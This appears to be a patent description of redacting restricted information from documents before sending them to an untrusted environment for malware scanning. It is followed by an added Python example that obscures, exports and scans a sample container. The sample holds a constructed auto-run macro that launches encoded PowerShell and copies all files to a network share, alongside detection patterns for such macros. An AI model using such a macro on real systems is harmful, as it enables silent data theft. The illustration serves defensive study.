This invention relates generally to data processing systems and networks and, in particular, to those systems that enable the simultaneous existence of different sites or environments in which access to information may be restricted to one or several of the sites or environments.
Many current document handling systems such as word processors and spreadsheet programs are capable of including an active program logic portion along with data and/or text in a single file. Such a file is capable of being exchanged between data processing systems or between environments located on a single system. Such a file is representative of a class of objects used for exchanging code and/or data between distinct systems or environments. Such objects are referred to herein as information containers.
There are a number of software tools that are currently available for searching files for content with specific characteristics (e.g., unwanted data or active program content). Examples of such tools include anti-virus programs, string matching programs, and a variety of data mining programs.
A problem is created if a particular software tool is not available or cannot be run at a first data processing environment where the use of the tool is desired. In this case it is typically necessary to make the information container available at a second environment where the tool is available. However, the second data processing environment may be considered, relative to the first, originating data processing environment, as an "untrusted" environment. As such, an operator at the first data processing environment may be reluctant or unwilling to expose an information container of interest to the second data processing environment, as the information container of interest may contain restricted information, considered herein to be any information that is deemed to be sensitive, confidential, secret and/or proprietary, or any other information deemed as restricted to the first data processing environment. Restricted information may exist in the information container within data and/or program modules.
Even if the operator of the first data processing environment were to consider the second data processing environment as a trusted environment, it may still be necessary to transport the information container of interest through an untrusted medium, e.g., through a data communications network such as the Internet. Alternatively, both data processing environments may exist on the same logical or physical data processing unit. In such cases it may be possible to expose the information container of interest to the second data processing environment through a means which does not require transport. One example of such a means is to change the access permission associated with the information container existing in the first data processing environment in order to allow the second data processing environment to directly access the information container of interest.
It is a first object and advantage of this invention to provide a method and apparatus for securely exposing information from a first data processing environment to a second data processing environment so as to overcome the foregoing and other problems.
It is a second object and advantage of this invention to provide a method and apparatus for securely exposing information from a first data processing environment to a second data processing environment by first automatically identifying that information which causes the entire information container to be deemed as containing restricted information.
It is a third object and advantage of this invention to provide a method and apparatus for securely exposing information from a first data processing environment to a second data processing environment by first automatically identifying that information which causes the entire information container to be deemed as containing restricted information, and then automatically creating a new or modified version of the initial information container which contains none of the automatically identified information.
It is a fourth object and advantage of this invention to provide a method and apparatus for securely exposing information from a first data processing environment to a second data processing environment by first automatically identifying that information which causes the entire information container to be deemed as containing restricted information, and then automatically creating a new or modified version of the initial information container which contains a replacement for the automatically identified information such that the entire modified or created information container is not deemed as containing restricted information.
The foregoing and other problems are overcome and the objects and advantages are realized by methods and apparatus in accordance with embodiments of this invention.
In a first aspect this invention teaches a method for operating a data processing system of a type that includes a first data processing environment located within a trusted environment and a second data processing environment located within, or that is accessible through, an untrusted environment. A trusted environment can comprise one or more distinct environments, all of which are trusted. The method includes a first step, executed at the first data processing environment, of operating a first software agent for detecting a presence of an information container with characteristics that make it desirable for the information container to be used in the untrusted environment. A second step of the method analyzes the identified information container in order to identify the presence and location(s) of at least one predetermined type of restricted information. A third step of the method modifies the information container or creates a new information container in which all information identified as restricted is obscured. In a fourth step, some or none of the unrestricted information (preserved in its original or an equivalent form), together with some or none of the obscured information, is made available to the untrusted environment for use.
In a further aspect this invention teaches a method for securely exposing an information container of interest from a first data processing environment to a second data processing environment, and includes computer executed steps of (a) identifying the presence and location of all occurrences of at least one predetermined type of restricted information within the information container of interest, and (b) obscuring the restricted information using a process which has the property of converting restricted information to a form that would not be identified as restricted by the criteria used in step (a), where the obscuring process may include at least one of removal, replacement, encryption, translation, modification and a structured substitution of the restricted information. This method further includes the steps of: (c) collecting some or none of the unrestricted information in its original or an equivalent form with some or none of the obscured information, and (d) making the collected information separately or jointly available to the second data processing environment without exposing any of the restricted information to the second data processing environment. The method may further include the steps of: (e) processing the supplied information at the second data processing environment and (f) performing actions based on the processing results.
The processing performed at the second data processing environment can utilize the supplied information in any manner available at the second data processing environment, such as detecting the presence of an undesirable software or data entity, identifying an undesirable software or data entity, detecting the presence of specific values, types, or patterns in data which has not been obscured, or removing an undesirable software or data entity from the supplied information. In some cases, processing may include a step of sending resulting information to the first data processing environment or to other data processing environments. Processing may also request additional information one or more times from the first data processing environment, or from other data processing environments, in order to complete the processing at the second data processing environment.
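The following is an added worked example, not code from the patent, showing steps (a) through (f) above end to end on a small constructed container that holds text, data fields and an embedded macro. Everything in it is an assumption for illustration: the sample container, the set of restricted-information types, the "[KIND_hex]" token shape used as the structured substitution, the undesirable-content patterns the untrusted tool applies, and the TRUSTED_KEY. It goes slightly beyond the text in two ways: the obscuring pass re-applies the step (a) criteria to its own output and refuses to export until they find nothing, and substitution tokens are keyed and deterministic, so a restricted value that recurs (here inside both a data field and the macro) maps to a single token.

```python
"""Added example (not from the patent): identify, obscure, verify, export,
scan in the untrusted environment, then resolve the results at the trusted
side.  Sample data, pattern sets, token format and key are all constructed."""
import hashlib
import hmac
import re
from copy import deepcopy

# Constructed sample container: free text, structured data and active macro code.
SAMPLE_CONTAINER = {
    "text": "Contact alice@example.com about project DEEPBLUE. SSN 123-45-6789 on file.",
    "data": {"customer_id": "ACME-0042", "notes": "Ship to 10.1.2.3"},
    "macro": (
        "Sub AutoOpen()\n"
        "  Shell \"powershell -enc <b64> ; copy * \\\\10.1.2.3\\drop\", vbHide\n"
        "End Sub"
    ),
}

# Step (a) criteria: the predetermined types of restricted information (assumed).
RESTRICTED_PATTERNS = {
    "email": re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"),
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "codename": re.compile(r"\bDEEPBLUE\b"),
    "internal_ip": re.compile(r"\b10\.\d{1,3}\.\d{1,3}\.\d{1,3}\b"),
}

# Step (e) criteria applied by the tool in the untrusted environment (assumed).
UNDESIRABLE_PATTERNS = {
    "encoded_powershell": re.compile(r"powershell(?:\.exe)?\s+-enc(?:odedcommand)?\b", re.I),
    "autoopen_shell": re.compile(r"AutoOpen[\s\S]*?\bShell\b"),
}

# Constructed key that never leaves the first environment.  Keyed tokens are
# deterministic (one value -> one token) but cannot be tested against guesses
# by anyone who lacks the key.
TRUSTED_KEY = b"constructed-demo-key-never-leaves-env-1"


def _strings(node, path=()):
    """Yield (path, string) for every string leaf of a nested dict/list."""
    if isinstance(node, dict):
        for k, v in node.items():
            yield from _strings(v, path + (k,))
    elif isinstance(node, list):
        for i, v in enumerate(node):
            yield from _strings(v, path + (i,))
    elif isinstance(node, str):
        yield path, node


def _set(container, path, value):
    node = container
    for p in path[:-1]:
        node = node[p]
    node[path[-1]] = value


def find_restricted(container):
    """Step (a): every occurrence as (path, type, start, end, matched_text)."""
    return [(path, kind, m.start(), m.end(), m.group())
            for path, s in _strings(container)
            for kind, pat in RESTRICTED_PATTERNS.items()
            for m in pat.finditer(s)]


def _token(kind, secret, key):
    """Structured substitution: a type-tagged keyed placeholder whose shape,
    [KIND_hex12], matches none of RESTRICTED_PATTERNS."""
    digest = hmac.new(key, secret.encode(), hashlib.sha256).hexdigest()[:12]
    return f"[{kind.upper()}_{digest}]"


def obscure(container, key=TRUSTED_KEY, max_passes=5):
    """Step (b): replace each hit with a token and repeat until the step (a)
    criteria find nothing (the property required of the obscuring process).
    Returns (obscured_container, token->original mapping); the mapping stays
    in the trusted environment."""
    out, mapping = deepcopy(container), {}
    for _ in range(max_passes):
        hits = find_restricted(out)
        if not hits:
            return out, mapping
        by_path = {}
        for path, kind, start, end, text in hits:
            by_path.setdefault(path, []).append((start, end, kind, text))
        for path, s in list(_strings(out)):
            limit = len(s)  # replace right-to-left so earlier offsets stay valid
            for start, end, kind, text in sorted(by_path.get(path, []), reverse=True):
                if end > limit:  # overlaps a span already replaced this pass
                    continue
                tok = _token(kind, text, key)
                mapping[tok] = text
                s, limit = s[:start] + tok + s[end:], start
            _set(out, path, s)
    raise ValueError("obscuring did not converge; refusing to export")


def export_for_untrusted(obscured, include=("text", "data", "macro")):
    """Steps (c)/(d): collect what the second environment may see.  Here the
    whole obscured container is exported; the token mapping is not."""
    return {k: deepcopy(obscured[k]) for k in include if k in obscured}


def _line_of(s, pos):
    start = s.rfind("\n", 0, pos) + 1
    end = s.find("\n", pos)
    return s[start:end if end != -1 else len(s)]


def scan_untrusted(supplied):
    """Step (e), untrusted side: sees full program content but only tokens in
    place of restricted data.  Returns (path, finding, offending_line)."""
    return [(path, name, _line_of(s, m.start()))
            for path, s in _strings(supplied)
            for name, pat in UNDESIRABLE_PATTERNS.items()
            for m in pat.finditer(s)]


def resolve_findings(findings, mapping):
    """Step (f), trusted side: restore originals inside the returned lines
    before acting on them; only the holder of the mapping can do this."""
    resolved = []
    for path, name, line in findings:
        for tok, original in mapping.items():
            line = line.replace(tok, original)
        resolved.append((path, name, line))
    return resolved


if __name__ == "__main__":
    obscured, mapping = obscure(SAMPLE_CONTAINER)
    supplied = export_for_untrusted(obscured)
    for item in resolve_findings(scan_untrusted(supplied), mapping):
        print(item)
```

Two points the script makes concrete: the restricted internal address is removed from the macro as well as from the data field, so the untrusted tool still sees the suspicious encoded-PowerShell invocation but never the address it targets; and because the same value yields the same token, the first environment can turn the tool's reported line back into its original form by consulting a mapping that was never exported.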